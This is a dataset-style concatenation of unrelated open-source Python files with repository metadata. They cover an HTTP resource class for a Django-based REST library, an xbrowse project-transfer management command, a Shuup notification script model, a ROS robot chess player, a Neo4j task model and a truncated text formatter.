accept_type = self.get_accept_type(request)
if serializers.supports_encoding(accept_type):
content = serializers.encode(accept_type, content)
response['Content-Type'] = accept_type
response.content = content
return response
# ## Request Method Handlers
# ### _HEAD_ Request Handler
# Default handler for _HEAD_ requests. For this to be available,
# a _GET_ handler must be defined.
def head(self, request, *args, **kwargs):
return self.get(request, *args, **kwargs)
# ### _OPTIONS_ Request Handler
# Default handler _OPTIONS_ requests.
def options(self, request, *args, **kwargs):
response = UncacheableResponse()
# See [RFC 5789][0]
# [0]: http://tools.ietf.org/html/rfc5789#section-3.1
if 'PATCH' in self.allowed_methods:
response['Accept-Patch'] = ', '.join(self.supported_patch_types)
response['Allow'] = ', '.join(sorted(self.allowed_methods))
response['Content-Length'] = 0
return response
# ## Response Status Code Handlers
# Each handler prefixed with `is_` corresponds to various client (4xx)
# and server (5xx) error checking. For example, `is_not_found` will
# return `True` if the resource does not exit. _Note: all handlers are
# must return `True` to fail the check._
# ### Service Unavailable
# Checks if the service is unavailable based on the `unavailable` flag.
# Set the `Retry-After` header if possible to inform clients when
# the resource is expected to be available.
# See also: `unavailable`
def is_service_unavailable(self, request, response, *args, **kwargs):
if self.unavailable:
if type(self.unavailable) is int and self.unavailable > 0:
retry = self.unavailable
elif type(self.unavailable) is datetime:
retry = http_date(timegm(self.unavailable.utctimetuple()))
else:
retry = None
if retry:
response['Retry-After'] = retry
return True
return False
# ### Unauthorized
# Checks if the request is authorized to access this resource.
# Default is a no-op.
def is_unauthorized(self, request, response, *args, **kwargs):
return False
# ### Forbidden
# Checks if the request is forbidden. Default is a no-op.
def is_forbidden(self, request, response, *args, **kwargs):
return False
# ### Too Many Requests
# Checks if this request is rate limited. Default is a no-op.
def is_too_many_requests(self, request, response, *args, **kwargs):
return False
# ### Request Entity Too Large
# Check if the request entity is too large to process.
def is_request_entity_too_large(self, request, response, *args, **kwargs):
content_length = get_content_length(request)
if self.max_request_entity_length and \
content_length > self.max_request_entity_length:
return True
# ### Method Not Allowed
# Check if the request method is not allowed.
def is_method_not_allowed(self, request, response, *args, **kwargs):
if request.method not in self.allowed_methods:
response['Allow'] = ', '.join(sorted(self.allowed_methods))
return True
return False
# ### Unsupported Media Type
# Check if this resource can process the request entity body. Note
# `Content-Type` is set as the empty string, so ensure it is not falsy
# when processing it.
def is_unsupported_media_type(self, request, response, *args, **kwargs):
# Ensure there actually is a request body to be decoded
if not get_content_length(request):
return
if 'CONTENT_TYPE' in request.META:
if not self.content_type_supported(request, response):
return True
if not self.content_encoding_supported(request, response):
return True
if not self.content_language_supported(request, response):
return True
return False
# ### Not Acceptable
# Check if this resource can return an acceptable response.
def is_not_acceptable(self, request, response, *args, **kwargs):
if not self.accept_type_supported(request, response):
return True
if 'HTTP_ACCEPT_LANGUAGE' in request.META:
if not self.accept_language_supported(request, response):
return True
if 'HTTP_ACCEPT_CHARSET' in request.META:
if not self.accept_charset_supported(request, response):
return True
if 'HTTP_ACCEPT_ENCODING' in request.META:
if not self.accept_encoding_supported(request, response):
return True
return False
# ### Precondition Required
# Check if a conditional request is
def is_precondition_required(self, request, response, *args, **kwargs):
if not self.require_conditional_request:
return False
if self.use_etags and 'HTTP_IF_MATCH' not in request.META:
return True
if self.use_last_modified and 'HTTP_IF_UNMODIFIED_SINCE' not in \
request.META:
return True
return False
def is_precondition_failed(self, request, response, *args, **kwargs):
# ETags are enabled. Check for conditional request headers. The current
# ETag value is used for the conditional requests. After the request
# method handler has been processed, the new ETag will be calculated.
if self.use_etags and 'HTTP_IF_MATCH' in request.META:
request_etag = parse_etags(request.META['HTTP_IF_MATCH'])[0]
etag = self.get_etag(request, request_etag)
if request_etag != etag:
return True
# Last-Modified date enabled. check for conditional request headers.
# The current modification datetime value is used for the conditional
# requests. After the request method handler has been processed, the
# new Last-Modified datetime will be returned.
if self.use_last_modified and 'HTTP_IF_UNMODIFIED_SINCE' in \
request.META:
last_modified = self.get_last_modified(request, *args, **kwargs)
known_last_modified = EPOCH_DATE + timedelta(
seconds=parse_http_date(
request.META['HTTP_IF_UNMODIFIED_SINCE']))
if known_last_modified != last_modified:
return True
return False
# ### Not Found
# Checks if the requested resource exists.
def is_not_found(self, request, response, *args, **kwargs):
return False
# ### Gone
# Checks if the resource _no longer_ exists.
def is_gone(self, request, response, *args, **kwargs):
return False
# ## Request Accept-* handlers
# Checks if the requested `Accept` mimetype is supported. Defaults
# to using the first specified mimetype in `supported_accept_types`.
def accept_type_supported(self, request, response):
if 'HTTP_ACCEPT' in request.META:
accept_type = request.META['HTTP_ACCEPT']
mimetypes = list(self.supported_accept_types)
mimetypes.reverse()
match = mimeparse.best_match(mimetypes, accept_type)
if match:
request._accept_type = match
return True
# Only if `Accept` explicitly contains a `*/*;q=0.0`
# does it preclude from returning a non-matching mimetype.
# This may be desirable behavior (or not), so add this as an
# option, e.g. `force_accept_type`
if mimeparse.quality('*/*', accept_type) == 0:
return False
# If `supported_accept_types` is empty, it is assumed that the resource
# will return whatever it wants.
if self.supported_accept_types:
request._accept_type = self.supported_accept_types[0]
return True
# Checks if the requested `Accept-Charset` is supported.
def accept_charset_supported(self, request, response):
return True
# Checks if the requested `Accept-Encoding` is supported.
def accept_encoding_supported(self, request, response):
return True
# Checks if the requested `Accept-Language` is supported.
def accept_language_supported(self, request, response):
return True
def get_accept_type(self, request):
if hasattr(request, '_accept_type'):
return request._accept_type
if self.supported_accept_types:
return self.supported_accept_types[0]
# ## Conditionl Request Handlers
# ### Get/Calculate ETag
# Calculates an etag for the requested entity.
# Provides the client an entity tag for future conditional
# requests.
# For GET and HEAD requests the `If-None-Match` header may be
# set to check if the entity has changed since the last request.
# For PUT, PATCH, and DELETE requests, the `If-Match` header may be
# set to ensure the entity is the same as the cllient's so the current
# operation is valid (optimistic concurrency).
def get_etag(self, request, response, etag=None):
cache = self.get_cache(request, response)
# Check cache first
if etag is not None and etag in cache:
return etag
# If the Etag has been set already upstream use it, otherwise calculate
def set_etag(self, request, response):
if 'ETag' in response:
etag = parse_etags(response['ETag'])[0]
else:
etag = hashlib.md5(response.content).hexdigest()
response['ETag'] = quote_etag(etag)
# Cache the etag for subsequent look ups. This can be cached
# indefinitely since these are unique values
cache = self.get_cache(request, response)
cache.set(etag, 1, MAX_CACHE_AGE)
# ### Get/Calculate Last Modified Datetime
# Calculates the last modified time for the requested entity.
# Provides the client the last modified of the entity for future
# conditional requests.
def get_last_modified(self, request):
return datetime.now()
# Set the last modified date on the response
def set_last_modified(self, request, response):
if 'Last-Modified' not in response:
response['Last-Modified'] = self.get_last_modified(request)
# ### Calculate Expiry Datetime
# (not implemented)
# Gets the expiry date and time for the requested entity.
# Informs the client when the entity will be invalid. This is most
# useful for clients to only refresh when they need to, otherwise the
# client's local cache is used.
def get_expiry(self, request, cache_timeout=None):
if cache_timeout is None:
cache_timeout = self.cache_max_age
return time.time() + cache_timeout
def set_expiry(self, request, response, cache_timeout=None):
if 'Expires' not in response:
response['Expires'] = http_date(
self.get_expiry(request, cache_timeout))
# ## Entity Content-* handlers
# Check if the request Content-Type is supported by this resource
# for decoding.
def content_type_supported(self, request, response, *args, **kwargs):
content_type = request.META['CONTENT_TYPE']
mimetypes = list(self.supported_content_types)
mimetypes.reverse()
match = mimeparse.best_match(mimetypes, content_type)
if match:
request._content_type = match
return True
return False
def content_encoding_supported(self, request, response, *args, **kwargs):
return True
def content_language_supported(self, request, response, *args, **kwargs):
return True
# Utility methods
def get_cache(self, request, response):
"Returns the cache to be used for various components."
from django.core.cache import cache
return cache
def get_cache_timeout(self, request, response):
if isinstance(self.cache_max_age, timedelta):
return datetime.now() + self.cache_max_age
return self.cache_max_age
def response_cache_control(self, request, response):
attrs = {}
timeout = self.get_cache_timeout(request, response)
# If explicit 0, do no apply max-age or expires
if isinstance(timeout, datetime):
response['Expires'] = http_date(timegm(timeout.utctimetuple()))
elif isinstance(timeout, int):
if timeout <= 0:
timeout = 0
attrs['no_cache'] = True
attrs['max_age'] = timeout
if self.cache_must_revalidate:
attrs['must_revalidate'] = True
if self.cache_no_store:
attrs['no_store'] = True
if self.cache_type:
attrs[self.cache_type] = True
if attrs:
patch_cache_control(response, **attrs)
# Process methods
def process_request(self, request, *args, **kwargs):
# Initilize a new response for this request. Passing the response along
# the request cycle allows for gradual modification of the headers.
response = HttpResponse()
# TODO keep track of a list of request headers used to
# determine the resource representation for the 'Vary'
# header.
# ### 503 Service Unavailable
# The server does not need to be unavailable for a resource to be
# unavailable...
if self.is_service_unavailable(request, response, *args, **kwargs):
response.status_code = codes.service_unavailable
return response
# ### 414 Request URI Too Long _(not implemented)_
# This should be be handled upstream by the Web server
# ### 400 Bad Request _(not implemented)_
# Note that many services respond with this code when entities are
# unprocessable. This should really be a 422 Unprocessable Entity
# Most actualy bad requests are handled upstream by the Web server
# when parsing the HTTP message
# ### 401 Unauthorized
# Check if the request is authorized to access this resource.
if self.is_unauthorized(request, response, *args, **kwargs):
response.status_code = codes.unauthorized
return response
# ### 403 Forbidden
# Check if this resource is forbidden for the request.
if self.is_forbidden(request, response, *args, **kwargs):
response.status_code = codes.forbidden
return response
# ### 501 Not Implemented _(not implemented)_
# This technically refers to a service-wide response for an
# unimplemented request method, again this is upstream.
# ### 429 Too Many Requests
# Both `rate_limit_count` and `rate_limit_seconds` must be none
# falsy values to be checked.
if self.rate_limit_count and self.rate_limit_seconds:
if self.is_too_many_requests(request, response, *args, **kwargs):
response.status_code = codes.too_many_requests
return response
# ### 405 Method Not Allowed
if self.is_method_not_allowed(request, response, *args, **kwargs):
response.status_code = codes.method_not_allowed
return response
# ### 406 Not Acceptable
# Checks Accept and Accept-* headers
if self.is_not_acceptable(request, response, *args, **kwargs):
response.status_code = codes.not_acceptable
return response
# ### Process an _OPTIONS_ request
# Enough processing has been performed to allow an OPTIONS request.
if request.method == methods.OPTIONS and 'OPTIONS' in \
self.allowed_methods:
return self.options(request, response)
# ## Request Entity Checks
# ### 415 Unsupported Media Type
# Check if the entity `Content-Type` supported for decoding.
if self.is_unsupported_media_type(request, response, *args, **kwargs):
response.status_code = codes.unsupported_media_type
return response
# ### 413 Request Entity Too Large
# Check if the entity is too large for processing
if self.is_request_entity_too_large(request, response, *args,
**kwargs):
response.status_code = codes.request_entity_too_large
return response
# ### 404 Not Found
# Check if this resource exists. Note, if this requires a database
# lookup or some other expensive lookup, the relevant object may
# be _attached_ to the request or response object to be used
# dowstream in the handler. This prevents multiple database
# hits or filesystem lookups.
if self.is_not_found(request, response, *args, **kwargs):
response.status_code = codes.not_found
return response
# ### 410 Gone
# Check if this resource used to exist, but does not anymore. A common
# strategy for this when dealing with this in a database context is to
# have an `archived` or `deleted` flag that can be used associated with
# the given lookup key while the rest of the content in the row may be
# deleted.
if self.is_gone(request, response, *args, **kwargs):
response.status_code = codes.gone
return response
# ### 428 Precondition Required
# Prevents the "lost udpate" problem and requires client to confirm
# the state of the resource has not changed since the last `GET`
# request. This applies to `PUT` and `PATCH` requests.
if request.method == methods.PUT or request.method == methods.PATCH:
if self.is_precondition_required(request, response, *args,
**kwargs):
return UncacheableResponse(status=codes.precondition_required)
# ### 412 Precondition Failed
# Conditional requests applies to GET, HEAD, PUT, and PATCH.
# For GET and HEAD, the request checks the either the entity changed
# since the last time it requested it, `If-Modified-Since`, or if the
# entity tag (ETag) has changed, `If-None-Match`.
if request.method == methods.PUT or request.method == methods.PATCH:
if self.is_precondition_failed(request, response, *args, **kwargs):
return UncacheableResponse(status=codes.precondition_failed)
# Check for conditional GET or HEAD request
if request.method == methods.GET or request.method == methods.HEAD:
# Check Etags before Last-Modified...
if self.use_etags and 'HTTP_IF_NONE_MATCH' in request.META:
# Parse request Etags (only one is currently supported)
request_etag = parse_etags(
request.META['HTTP_IF_NONE_MATCH'])[0]
# Check if the request Etag is valid. The current Etag is
# supplied to enable strategies where the etag does not need
# to be used to regenerate the Etag. This may include
# generating an MD5 of the resource and storing it as a key
# in memcache.
etag = self.get_etag(request, response, request_etag, *args,
**kwargs)
# Nothing has changed, simply return
if request_etag == etag:
response.status_code = codes.not_modified
return response
if self.use_last_modified and 'HTTP_IF_MODIFIED_SINCE' in \
request.META:
# Get the last known modified date from the client, compare it
# to the last modified date of the resource
last_modified = self.get_last_modified(request, *args,
**kwargs)
known_last_modified = EPOCH_DATE + timedelta(
seconds=parse_http_date(
request.META['HTTP_IF_MODIFIED_SINCE']))
if known_last_modified >= last_modified:
response.status_code = codes.not_modified
return response
if get_content_length(request):
content_type = request._content_type
if content_type in serializers:
if isinstance(request.body, bytes):
data = serializers.decode(content_type,
request.body.decode('utf-8'))
else:
data = serializers.decode(content_type, request.body)
request.data = data
# ## Process the normal response returned by the handler
def process_response(self, request, response):
# Set default content-type for no content response
if no_content_response(response):
# Do not alter the content-type if an attachment is supplied
if 'Content-Disposition' not in response:
accept_type = self.get_accept_type(request)
if accept_type:
response['Content-Type'] = accept_type
if request.method != methods.HEAD and response.status_code == \
codes.ok:
response.status_code = codes.no_content
# Set content to nothing after no content is handled since it must
# retain the properties of the GET response
if request.method == methods.HEAD:
response.content = ''
if request.method in (methods.GET, methods.HEAD):
self.response_cache_control(request, response)
if self.use_etags:
self.set_etag(request, response)
if self.use_last_modified:
self.set_last_modified(request, response)
return response
class TemplateResource(TemplateResponseMixin, Resource):
pass
|
bsd-2-clause
| -3,642,157,530,269,288,400
| 40.557647
| 79
| 0.635602
| false
| 4.314118
| false
| false
| false
|
macarthur-lab/xbrowse
|
xbrowse_server/base/management/commands/transfer_dataset_from_other_project.py
|
1
|
6685
|
from django.core import serializers
import os
from datetime import datetime
from django.core.management.base import BaseCommand
from xbrowse_server.base.models import Project, ProjectCollaborator, Project, \
Family, FamilyImageSlide, Cohort, Individual, \
FamilySearchFlag, ProjectPhenotype, IndividualPhenotype, FamilyGroup, \
CausalVariant, ProjectTag, VariantTag, VariantNote, ReferencePopulation, \
UserProfile, VCFFile, ProjectGeneList
from xbrowse_server.mall import get_project_datastore, get_datastore
from pprint import pprint
from xbrowse_server import sample_management
def update(mongo_collection, match_json, set_json):
print("-----")
print("updating %s to %s" % (match_json, set_json))
#return
update_result = mongo_collection.update_many(match_json, {'$set': set_json})
print("updated %s out of %s records" % (update_result.modified_count, update_result.matched_count))
return update_result
def update_family_analysis_status(project_id):
for family in Family.objects.filter(project__project_id=project_id):
if family.analysis_status == "Q" and family.get_data_status() == "loaded":
print("Setting family %s to Analysis in Progress" % family.family_id)
family.analysis_status = "I" # switch status from Waiting for Data to Analysis in Progress
family.save()
def check_that_exists(mongo_collection, match_json, not_more_than_one=False):
#return
records = list(mongo_collection.find(match_json))
if len(records) == 0:
print("%s query %s matched 0 records" % (mongo_collection, match_json))
return False
if not_more_than_one and len(records) > 1:
print("%s query %s matched more than one record: %s" % (mongo_collection, match_json, records))
return False
print("-----")
print("%s query %s returned %s record(s): \n%s" % (mongo_collection, match_json, len(records), "\n".join(map(str, records))))
return True
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('-d', '--destination-project', help="project id to which to transfer the datasets", required=True)
parser.add_argument('-f', '--from-project', help="project id from which to take the datatsets", required=True)
def transfer_project(self, from_project_id, destination_project_id):
print("From: " + from_project_id)
print("To: " + destination_project_id)
from_project = Project.objects.get(project_id=from_project_id)
destination_project = Project.objects.get(project_id=destination_project_id)
# Make sure individuals are the same
indivs_missing_from_dest_project = (set(
[i.indiv_id for i in Individual.objects.filter(project=from_project)]) - set(
[i.indiv_id for i in Individual.objects.filter(project=destination_project)]))
if indivs_missing_from_dest_project:
raise Exception("Individuals missing from dest project: " + str(indivs_missing_from_dest_project))
# update VCFs
vcfs = from_project.families_by_vcf().keys()
for vcf_file_path in vcfs:
vcf_file = VCFFile.objects.get_or_create(file_path=os.path.abspath(vcf_file_path))[0]
sample_management.add_vcf_file_to_project(destination_project, vcf_file)
print("Added %s to project %s" % (vcf_file, destination_project.project_id))
families_db = get_datastore()._db
projects_db = get_project_datastore()._db
print("==========")
print("Checking 'from' Projects and Families:")
if not check_that_exists(projects_db.projects, {'project_id': from_project_id}, not_more_than_one=True):
raise ValueError("There needs to be 1 project db in %(from_project_id)s" % locals())
if not check_that_exists(families_db.families, {'project_id': from_project_id}, not_more_than_one=False):
raise ValueError("There needs to be atleast 1 family db in %(from_project_id)s" % locals())
print("==========")
print("Make Updates:")
datestamp = datetime.now().strftime("%Y-%m-%d")
if check_that_exists(projects_db.projects, {'project_id': destination_project_id}, not_more_than_one=True):
result = update(projects_db.projects, {'project_id': destination_project_id}, {'project_id': destination_project_id+'_previous', 'version': datestamp})
if check_that_exists(families_db.families, {'project_id': destination_project_id}, not_more_than_one=False):
result = update(families_db.families, {'project_id': destination_project_id}, {'project_id': destination_project_id+'_previous', 'version': datestamp})
result = update(projects_db.projects, {'project_id': from_project_id}, {'project_id': destination_project_id, 'version': '2'})
result = update(families_db.families, {'project_id': from_project_id}, {'project_id': destination_project_id, 'version': '2'})
print("==========")
print("Checking Projects:")
if not check_that_exists(projects_db.projects, {'project_id': destination_project_id}, not_more_than_one=True):
raise ValueError("After: There needs to be 1 project db in %(destination_project_id)s" % locals())
if not check_that_exists(families_db.families, {'project_id': destination_project_id}, not_more_than_one=False):
raise ValueError("After: There needs to be atleast 1 family db in %(destination_project_id)s" % locals())
update_family_analysis_status(destination_project_id)
print("Data transfer finished.")
i = raw_input("Delete the 'from' project: %s? [Y/n] " % from_project_id)
if i.strip() == 'Y':
sample_management.delete_project(from_project_id)
print("Project %s deleted" % from_project_id)
else:
print("Project not deleted")
def handle(self, *args, **options):
from_project_id = options["from_project"]
destination_project_id = options["destination_project"]
assert from_project_id
assert destination_project_id
print("Transfering data from project %s to %s" % (from_project_id, destination_project_id))
print("WARNING: this can only be done once")
if raw_input("Continue? [Y/n] ").lower() != 'y':
return
else:
print("")
self.transfer_project(from_project_id, destination_project_id)
#for project in Project.objects.all():
# print("Project: " + project.project_id)
# update_family_analysis_status(project.project_id)
|
agpl-3.0
| 4,557,343,489,278,923,300
| 51.637795
| 163
| 0.653403
| false
| 3.738814
| false
| false
| false
|
suutari/shoop
|
shuup/notify/models/script.py
|
1
|
2353
|
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
from jsonfield.fields import JSONField
from shuup.core.fields import InternalIdentifierField
from shuup.notify.base import Event
from shuup.notify.enums import StepNext
@python_2_unicode_compatible
class Script(models.Model):
event_identifier = models.CharField(max_length=64, blank=False, db_index=True, verbose_name=_('event identifier'))
identifier = InternalIdentifierField(unique=True)
created_on = models.DateTimeField(auto_now_add=True, editable=False, verbose_name=_('created on'))
name = models.CharField(max_length=64, verbose_name=_('name'))
enabled = models.BooleanField(default=False, db_index=True, verbose_name=_('enabled'))
_step_data = JSONField(default=[], db_column="step_data")
def get_steps(self):
"""
:rtype Iterable[Step]
"""
if getattr(self, "_steps", None) is None:
from shuup.notify.script import Step
self._steps = [Step.unserialize(data) for data in self._step_data]
return self._steps
def set_steps(self, steps):
self._step_data = [step.serialize() for step in steps]
self._steps = steps
def get_serialized_steps(self):
return [step.serialize() for step in self.get_steps()]
def set_serialized_steps(self, serialized_data):
self._steps = None
self._step_data = serialized_data
# Poor man's validation
for step in self.get_steps():
pass
@property
def event_class(self):
return Event.class_for_identifier(self.event_identifier)
def __str__(self):
return self.name
def execute(self, context):
"""
Execute the script in the given context.
:param context: Script context
:type context: shuup.notify.script.Context
"""
for step in self.get_steps():
if step.execute(context) == StepNext.STOP:
break
|
agpl-3.0
| 998,860,068,812,881,000
| 33.602941
| 118
| 0.666383
| false
| 3.915141
| false
| false
| false
|
mkhuthir/catkin_ws
|
src/chessbot/src/r2_chess_pgn.py
|
1
|
2487
|
#!/usr/bin/python
import sys, rospy, tf, moveit_commander, random
from geometry_msgs.msg import Pose, Point, Quaternion
import pgn
class R2ChessboardPGN:
def __init__(self):
self.left_arm = moveit_commander.MoveGroupCommander("left_arm")
self.left_hand = moveit_commander.MoveGroupCommander("left_hand")
def setGrasp(self, state):
if state == "pre-pinch":
vec = [ 0.3, 0, 1.57, 0, # index
-0.1, 0, 1.57, 0, # middle
0, 0, 0, # ring
0, 0, 0, # pinkie
0, 1.1, 0, 0] # thumb
elif state == "pinch":
vec = [ 0, 0, 1.57, 0,
0, 0, 1.57, 0,
0, 0, 0,
0, 0, 0,
0, 1.1, 0, 0]
elif state == "open":
vec = [0] * 18
else:
raise ValueError("unknown hand state: %s" % state)
self.left_hand.set_joint_value_target(vec)
self.left_hand.go(True)
def setPose(self, x, y, z, phi, theta, psi):
orient = \
Quaternion(*tf.transformations.quaternion_from_euler(phi, theta, psi))
pose = Pose(Point(x, y, z), orient)
self.left_arm.set_pose_target(pose)
self.left_arm.go(True)
def setSquare(self, square, height_above_board):
if len(square) != 2 or not square[1].isdigit():
raise ValueError(
"expected a chess rank and file like 'b3' but found %s instead" %
square)
print "going to %s" % square
rank_y = -0.24 - 0.05 * int(square[1])
file_x = 0.5 - 0.05 * (ord(square[0]) - ord('a'))
z = float(height_above_board) + 1.0
self.setPose(file_x, rank_y, z, 3.14, 0.3, -1.57)
def playGame(self, pgn_filename):
game = pgn.loads(open(pgn_filename).read())[0]
self.setGrasp("pre-pinch")
self.setSquare("a1", 0.15)
for move in game.moves:
self.setSquare(move[0:2], 0.10)
self.setSquare(move[0:2], 0.015)
self.setGrasp("pinch")
self.setSquare(move[0:2], 0.10)
self.setSquare(move[2:4], 0.10)
self.setSquare(move[2:4], 0.015)
self.setGrasp("pre-pinch")
self.setSquare(move[2:4], 0.10)
if __name__ == '__main__':
moveit_commander.roscpp_initialize(sys.argv)
rospy.init_node('r2_chess_pgn',anonymous=True)
argv = rospy.myargv(argv=sys.argv) # filter out any arguments used by ROS
if len(argv) != 2:
print "usage: r2_chess_pgn.py PGNFILE"
sys.exit(1)
print "playing %s" % argv[1]
r2pgn = R2ChessboardPGN()
r2pgn.playGame(argv[1])
moveit_commander.roscpp_shutdown()
|
gpl-3.0
| 6,829,077,378,582,487,000
| 33.068493
| 76
| 0.582228
| false
| 2.735974
| false
| false
| false
|
cuoretech/dowork
|
dowork/Model/Task.py
|
1
|
8188
|
from database_config import *
from datetime import datetime
from py2neo import neo4j, node
# Class : Task
# Methods:
# 1) db_init(self) - Private
# 2) getNode(self) - Returns the Task Node
# 3) getName(self) - Returns name of task
# 4) setDescription(self, description) - Takes description as a string
# 5) getDescription(self) - Gets the description as a string
# 6) setEndTime(self, sTime) - Sets eTime in millis
# 7) getEndTime(self) - Gets eTime in millis
# 8) setInvestedTime(self, iTime) - Sets iTime in millis
# 9) getInvestedTime(self, iTime) - Gets iTime in millis
# 10) setDeadline(self, deadline) - Sets the deadline in millis
# 11) getDeadline(self) - Gets the deadline in millis
# 10) setPriority(self, priority) - Sets the priority of the task
# 11) getPriority(self) - Gets the priority of the task
# 12) assignToUser(self, owner) - owner is a node, Owner.getNode()
# 13) getAssignedUsers(self) - Returns a list of 'Node' Objects containing the User Nodes
# 14) setStatus(self, Status) - Status should be one of the STS Constants contained in Task
# 15) getStatus(self) - Returns status of Task
# 16) addSubTask(self, subtask) - Takes a (Task Node) subTask, returns a 'Path' object
# containing nodes and relationships used
# 17) getSubTasks(self) - a list of subtasks the current task has
# 18) addFile(self, file) - adds a file to the task
# 19) getFiles(self) - Returns a list of File Nodes
#
# Properties:
# 1) name
# 2) description
# 3) eTime
# 4) iTime
# 5) deadline
# 6) priority
# 7) status
STS_OPEN = "Open"
STS_CLOSED = "Closed"
STS_IN_PROG = "In_Progress"
class Task:
graph_db = None
taskInstance = None
def db_init(self):
if self.graph_db is None:
self.graph_db = neo4j.GraphDatabaseService(db_config['uri'])
#
# Function : getNode
# Arguments :
# Returns : TaskInstance Node
#
def getNode(self):
return self.taskInstance
#
# Function : Constructor
# Arguments : Uri of Existing Task Node OR Name of Task
#
def __init__(self, URI=None, Name=None, Status=None):
global LBL_TASK
self.db_init()
tempTask = None
if URI is not None:
tempTask = neo4j.Node(URI)
elif Name is not None and Status is not None:
tempTask = self.graph_db.get_or_create_indexed_node(IND_TASK, "nametime", Name+str(datetime.now()), {"name": Name, "status": Status})
tempTask.add_labels(LBL_TASK)
else:
raise Exception("Name/Status or URI not specified")
self.taskInstance = tempTask
if self.getUpdateTime() is None:
self.setUpdateTime()
# Function : __str__
# Arguments :
# Returns : name of task
#
def __str__(self):
if self.taskInstance is not None:
return self.taskInstance["name"]
else:
return None
#
# Function : getName
# Arguments :
# Returns : name of task
#
def getName(self):
if self.taskInstance is not None:
return self.taskInstance["name"]
else:
return None
#
# Function : setDescription
# Arguments : (String) description
#
def setDescription(self, description):
self.taskInstance["description"] = description
#
# Function : getDescription
# Arguments :
# Returns : (String) description
#
def getDescription(self):
return self.taskInstance["description"];
#
# Function : setEndTime
# Arguments : eTime in millis
# Returns :
#
def setEndTime(self, eTime):
self.taskInstance["eTime"] = eTime
#
# Function : getEndTime
# Arguments :
# Returns : eTime in millis
#
def getEndTime(self):
return self.taskInstance["eTime"]
#
# Function : setUpdateTime
# Arguments : String uTime (in milliseconds)
# Returns :
#
def setUpdateTime(self):
self.taskInstance['uTime'] = datetime.now()
#
# Function : getUpdateTime
# Arguments :
# Returns : (String) uTime
#
def getUpdateTime(self):
return self.taskInstance['uTime']
#
# Function : setInvestedTime
# Arguments : iTime
# Returns :
#
def setInvestedTime(self, iTime):
self.taskInstance["iTime"] = iTime
#
# Function : getInvestedTime
# Arguments :
# Returns : iTime in millis
#
def getInvestedTime(self):
return self.taskInstance["iTime"]
#
# Function : setDeadline
# Arguments : deadline
# Returns :
#
def setDeadline(self, deadline):
self.taskInstance["deadline"] = deadline
#
# Function : getDeadline
# Arguments :
# Returns : list of deadlines for the task
#
def getDeadline(self):
return self.taskInstance["deadline"]
#
# Function : setPriority
# Arguments : priority integer as string
# Returns :
#
def setPriority(self, priority):
self.taskInstance["priority"] = priority
#
# Function : getPriority
# Arguments :
# Returns : priority as string
#
def getPriority(self):
return self.taskInstance["priority"]
#
# Function : assignToUser
# Arguments : (User Node) owner
# Returns : a 'Path' object containing nodes and relationships used
#
def assignToUser(self, user):
global REL_ASSIGNEDTO, LBL_USER
if LBL_USER in user.get_labels():
return self.taskInstance.get_or_create_path(REL_ASSIGNEDTO, user)
else:
raise Exception("The Node Provided is not a User")
#
# Function : getAssignedUsers
# Arguments :
# Returns : a list of 'Node' Objects containing the User Nodes
#
def getAssignedUsers(self):
global REL_ASSIGNEDTO
users = list()
for relationship in list(self.taskInstance.match_outgoing(REL_ASSIGNEDTO)):
users.append(relationship.end_node)
return users
#
# Function : setStatus
# Arguments : (String) Status
# Returns :
#
def setStatus(self, Status):
self.taskInstance["status"] = Status
#
# Function : getStatus
# Arguments :
# Returns : Status of Task
#
def getStatus(self):
return self.taskInstance["status"]
#
# Function : addSubTask
# Arguments : (Task Node) subTask
# Returns : a 'Path' object containing nodes and relationships used
#
def addSubTask(self, subtask):
global REL_HASSUBTASK, LBL_TASK
if subtask is not None and LBL_TASK in subtask.get_labels():
return self.taskInstance.get_or_create_path(REL_HASSUBTASK, subtask)
else:
raise Exception("Please supply a proper Task Node(Task in Labels")
#
# Function : getSubTask
# Arguments :
# Returns : a list of subtasks the current task has
#
def getSubTasks(self):
global REL_HASSUBTASK
subTasks = list()
for relationship in list(self.taskInstance.match_outgoing(REL_HASSUBTASK)):
subTasks.append(relationship.end_node)
return subTasks
#
# Function : addFile
# Arguments : File Node
# Returns : a 'Path' object
#
def addFile(self, File):
global LBL_FILE, REL_HASFILE
if File is not None and LBL_FILE in File.get_labels():
return self.taskInstance.get_or_create_path(REL_HASFILE, File)
else:
raise Exception("Please supply a proper File Node (Node in Label)")
#
# Function : getFiles
# Arguments :
# Returns : a list of File Nodes
#
def getFiles(self):
global REL_HASFILE
files = list()
for relationship in list(self.taskInstance.match_outgoing(REL_HASFILE)):
files.append(relationship.end_node)
return files
# Clears the entire DB for dev purposes
def clear(self):
self.graph_db.clear()
|
apache-2.0
| 1,286,026,942,883,633,700
| 27.237931
| 145
| 0.605154
| false
| 3.580236
| false
| false
| false
|
mfnch/pyrtist
|
pyrtist/lib2d/text_formatter.py
|
1
|
3338
|
# Copyright (C) 2017, 2020 Matteo Franchin
#
# This file is part of Pyrtist.
# Pyrtist is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 2.1 of the License, or
# (at your option) any later version.
#
# Pyrtist is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrtist. If not, see <http://www.gnu.org/licenses/>.
try:
from cStringIO import StringIO # Python 2
except:
from io import StringIO # Python 3
__all__ = ('TextFormatter',)
class TextFormatter(object):
def __init__(self):
self.max_stack_level = 10
self.out = StringIO()
self.states = []
self.level = 0
self.string = None
self.cursor = 0
def push_state(self, old_state, new_state):
self.states.append(old_state)
return new_state
def pop_state(self):
return self.states.pop()
def pop_text(self):
ret = self.out.getvalue()
self.out = StringIO()
self.out.truncate()
return ret
def run(self, string):
self.cursor = 0
self.string = string
fn = self._state_normal
while self.cursor < len(self.string):
c = self.string[self.cursor]
fn = fn(c)
self.cmd_draw()
def _state_normal(self, c):
self.cursor += 1
if c == '_':
return self._state_wait_sub
if c == '^':
return self._state_wait_sup
if c == '\\':
return self.push_state(self._state_normal, self._state_literal)
if c == '}':
if self.level > 0:
